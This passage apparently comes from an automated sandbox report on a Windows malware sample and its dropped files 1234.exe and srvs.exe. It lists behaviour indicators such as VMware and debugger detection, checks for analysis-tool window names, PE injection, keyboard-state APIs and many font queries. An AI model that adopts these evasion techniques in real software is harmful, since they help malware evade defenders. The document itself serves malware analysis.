                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Nb2HQZZDIf.exeBinary or memory string: Hyper-V RAW
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 1234.exe, 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeSystem information queried: ModuleInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Roaming\1234.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\1234.exeMemory written: C:\Users\user\AppData\Roaming\1234.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140062600 mouse_event,
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
                      Source: Nb2HQZZDIf.exe, srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: Nb2HQZZDIf.exe, srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpBinary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
                      Source: srvs.exe, 00000015.00000002.482785153.0000000001B80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Users\user\AppData\Roaming\1234.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
